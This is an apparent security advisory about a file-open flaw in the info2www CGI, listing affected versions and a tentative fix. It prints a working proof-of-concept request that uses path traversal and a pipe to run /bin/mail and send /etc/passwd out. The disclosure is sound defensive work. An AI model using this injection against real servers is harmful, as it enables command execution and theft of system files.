COMMAND

    info2www

SYSTEMS AFFECTED

    Systems having info2www 1.1 (and some other versions)

PROBLEM

    Niall Smart found  following.  Some  versions of the  info2www CGI
    blindly open files:

    $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail user_name </etc/passwd|)'
    $
    You have new mail.
    $

    Trying to track down which versions of info2www have this bug  and
    which don't  has been  difficult, there  are lots  of variants out
    there, some of which aren't vulnerable.  Instead of trying to make
    a list of versions which are vulnerable let's say following:

        - if it has no version number, its probably vulnerable
        - the uuencoded version at CPAN is corrupt, and the one  which
          the README file tells you to get is vulnerable
        - version 1.1 is vulnerable
        - version 1.2.x seem ok (seems!)

    Apparently info2www is based  on info2html and infogate,  so these
    may have problems too.

SOLUTION

    1.2.x seems to be OK, but that is not confirmed yet.